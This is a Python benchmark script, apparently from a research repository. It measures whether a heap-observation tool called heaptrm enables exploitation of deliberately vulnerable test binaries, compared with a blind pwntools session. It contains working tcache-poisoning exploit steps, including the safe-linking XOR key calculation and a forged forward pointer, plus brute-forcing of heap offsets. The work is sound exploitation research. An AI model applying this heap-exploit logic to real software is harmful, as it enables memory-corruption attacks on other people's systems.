File size: 8,037 Bytes
e1fab24 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 | #!/usr/bin/env python3
"""
same_session_benchmark.py β The correct benchmark.
Both approaches run in the SAME process session:
A: heaptrm session β observe addresses, compute exploit, execute in same session
B: blind session β same binary, same protocol, but no heap observation
This tests: does structured heap observation enable exploitation that's
otherwise impossible? No LLM needed β the exploit logic is deterministic
given the addresses. The question is purely: can we GET the addresses?
"""
import subprocess
import json
import struct
import os
from pathlib import Path
from collections import defaultdict
ROOT = Path(__file__).parent.parent
SUITE = ROOT / "cve_tests" / "suite"
HEAPTRM = str(ROOT / "heaptrm-cli" / "target" / "release" / "heaptrm")
TRIALS = 10
def heaptrm_session(binary: str, sc: int) -> bool:
"""Single heaptrm session: observe + exploit in same process."""
proc = subprocess.Popen(
[HEAPTRM, binary],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
text=True
)
def cmd(action, data=""):
proc.stdin.write(json.dumps({"action": action, "data": data}) + "\n")
proc.stdin.flush()
line = proc.stdout.readline()
return json.loads(line) if line.strip() else {}
try:
# Setup: alloc 3, free 2
cmd("send", f"1 0 {sc}\n")
cmd("send", f"1 1 {sc}\n")
cmd("send", f"1 2 {sc}\n")
cmd("send", "4 0\n")
cmd("send", "4 1\n")
# OBSERVE β this is what heaptrm provides
r = cmd("observe")
if not r.get("heap"):
cmd("quit"); return False
chunks = r["heap"]["chunks"]
freed = sorted([c for c in chunks if c["state"] == "freed"],
key=lambda c: int(c["address"], 16))
allocated = sorted([c for c in chunks if c["state"] == "allocated"],
key=lambda c: int(c["address"], 16))
if len(freed) < 2 or not allocated:
cmd("quit"); return False
# COMPUTE β deterministic given addresses
chunk1_addr = int(freed[-1]["address"], 16)
target_addr = int(allocated[-1]["address"], 16)
xor_key = chunk1_addr >> 12
poisoned = target_addr ^ xor_key
fd_hex = struct.pack("<Q", poisoned).hex()[:16]
# EXPLOIT β in same session
cmd("send", f"2 1 {fd_hex}\n")
cmd("send", f"1 3 {sc}\n")
cmd("send", f"1 4 {sc}\n")
cmd("send", "2 4 50574e454421210a\n")
r = cmd("send", "3 2\n")
cmd("quit")
return r.get("output", "").find("50574e4544") >= 0
except Exception:
pass
finally:
try: proc.kill(); proc.wait(timeout=2)
except: pass
return False
def blind_session(binary: str, sc: int, config: dict) -> bool:
"""Same process, but no heap observation. Uses only binary output."""
from pwn import process as pwn_process, p64, context
context.log_level = "error"
p = pwn_process(binary)
try:
def do(cmd):
p.sendline(cmd.encode())
return p.recvline(timeout=1).strip()
r0 = do(f"1 0 {sc}")
r1 = do(f"1 1 {sc}")
r2 = do(f"1 2 {sc}")
do("4 0")
do("4 1")
# Try to extract info from binary output
addr0 = addr1 = addr2 = None
leaked_fd = None
# Check for address leaks in alloc output
for r, name in [(r0, "0"), (r1, "1"), (r2, "2")]:
if r and b"0x" in r:
try:
a = int(r.split(b"0x")[1].split()[0], 16)
if name == "0": addr0 = a
elif name == "1": addr1 = a
elif name == "2": addr2 = a
except: pass
# Try UAF read
p.sendline(f"3 1".encode())
leak = p.recvline(timeout=1).strip()
if leak and leak != b"DELETED" and leak != b"ERR" and len(leak) >= 16:
try:
leaked_fd = int(leak[:16], 16)
except: pass
# Compute based on available info
poisoned = None
if addr1 and addr2:
poisoned = addr2 ^ (addr1 >> 12)
elif leaked_fd and not addr1:
# Decrypt fd with guessed key
key = 0x555555559
decrypted = leaked_fd ^ key
if 0x555555550000 < decrypted < 0x555555570000:
target = decrypted + 0xa0
poisoned = target ^ key
elif addr0 and not addr1 and not addr2:
# Only first address β guess offsets
addr1_guess = addr0 + 0x50
addr2_guess = addr0 + 0xa0
poisoned = addr2_guess ^ (addr1_guess >> 12)
if poisoned is None:
# Pure blind β try common offsets
base = 0x555555559000
for off in [0x2a0, 0x300, 0x350, 0x400, 0x450, 0x500, 0x550,
0x600, 0x650, 0x700]:
c1 = base + off + 0x50
tgt = c1 + 0x50
test_poison = tgt ^ (c1 >> 12)
do(f"2 1 {p64(test_poison).hex()[:16]}")
do(f"1 3 {sc}")
do(f"1 4 {sc}")
do("2 4 50574e454421210a")
result = do("3 2")
if b"50574e4544" in result:
p.close()
return True
# Wrong β must restart (tcache corrupted)
p.close()
return False
do(f"2 1 {p64(poisoned).hex()[:16]}")
do(f"1 3 {sc}")
do(f"1 4 {sc}")
do("2 4 50574e454421210a")
result = do("3 2")
p.close()
return b"50574e4544" in result
except:
try: p.close()
except: pass
return False
def main():
manifest = json.loads((SUITE / "manifest.json").read_text())
print("=" * 80)
print("SAME-SESSION BENCHMARK: heaptrm vs blind (same process)")
print(f"{len(manifest)} challenges Γ {TRIALS} trials")
print("=" * 80)
by_diff = defaultdict(lambda: {"ht": 0, "bl": 0, "n": 0})
all_results = []
for config in manifest:
name = config["name"]
binary = str(SUITE / name)
if not Path(binary).exists():
continue
sc = 1
ht = bl = 0
for _ in range(TRIALS):
if heaptrm_session(binary, sc): ht += 1
if blind_session(binary, sc, config): bl += 1
diff = config["difficulty"]
by_diff[diff]["ht"] += ht
by_diff[diff]["bl"] += bl
by_diff[diff]["n"] += TRIALS
delta = ht - bl
marker = ">>>" if delta > TRIALS//2 else ">" if delta > 0 else "==" if delta == 0 else "<"
info = f"leak={config['addr_leak']:7s} uaf={str(config['uaf_read']):5s} noise={config['noise_min']}-{config['noise_max']}"
print(f" {name} [{diff:8s}] ht={ht:2d}/{TRIALS} bl={bl:2d}/{TRIALS} {marker:3s} | {info}")
all_results.append({
"name": name, "difficulty": diff,
"heaptrm": ht, "blind": bl, "trials": TRIALS,
**{k: config[k] for k in ["uaf_read", "addr_leak", "noise_min", "noise_max"]}
})
print("\n" + "=" * 80)
print(f"{'Difficulty':10s} {'heaptrm':>10s} {'blind':>10s} {'delta':>8s}")
for diff in ["easy", "medium", "hard", "extreme"]:
d = by_diff[diff]
if d["n"] == 0: continue
ht_pct = d["ht"] / d["n"] * 100
bl_pct = d["bl"] / d["n"] * 100
print(f"{diff:10s} {ht_pct:9.0f}% {bl_pct:9.0f}% {ht_pct-bl_pct:+7.0f}%")
total_ht = sum(d["ht"] for d in by_diff.values())
total_bl = sum(d["bl"] for d in by_diff.values())
total_n = sum(d["n"] for d in by_diff.values())
print(f"{'OVERALL':10s} {total_ht/total_n*100:9.0f}% {total_bl/total_n*100:9.0f}% {(total_ht-total_bl)/total_n*100:+7.0f}%")
Path("bench").mkdir(exist_ok=True)
with open("bench/same_session_results.json", "w") as f:
json.dump(all_results, f, indent=2)
if __name__ == "__main__":
main()
|